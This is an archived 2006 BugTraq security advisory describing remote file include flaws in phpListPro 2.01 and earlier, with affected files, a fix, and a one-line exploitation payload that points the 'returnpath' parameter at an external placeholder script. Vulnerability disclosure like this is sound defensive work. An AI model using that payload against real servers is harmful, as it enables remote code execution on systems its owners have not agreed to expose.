BugTraq
[MajorSecurity] phpListPro <= 2.01 - Multiple Remote File Include Vulnerability May 08 2006 02:50PM
admin majorsecurity de
[MajorSecurity] phpListPro <= 2.01 - Multiple Remote File Include Vulnerability

--------------------------------------------------------

Software: phpListPro

Version: <=2.01

Type: Multiple Remote File Include Vulnerability

Date: May, 8th 2006

Vendor: SmartISoft

Page: http://smartisoft.com

Risc: High

Credits:

----------------------------

'Aesthetico'

http://www.majorsecurity.de

Affected Products:

----------------------------

phpListPro 2.01 and prior

Description:

----------------------------

PHP/mySQL rating TopList professional.

Requirements:

----------------------------

register_globals = On

Vulnerability:

----------------------------

Input passed to the "returnpath" parameter in "editsite.php", "addsite.php", "in.php" is not

properly verified, before it is used to include files.

This can be exploited to execute arbitrary code by including files from external resources.

Solution:

----------------------------

Edit the source code to ensure that input is properly sanitised.

Set "register_globals" to "Off".

Exploitation:

----------------------------

Post data:

returnpath=http://www.yourspace.com/yourscript.php?

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus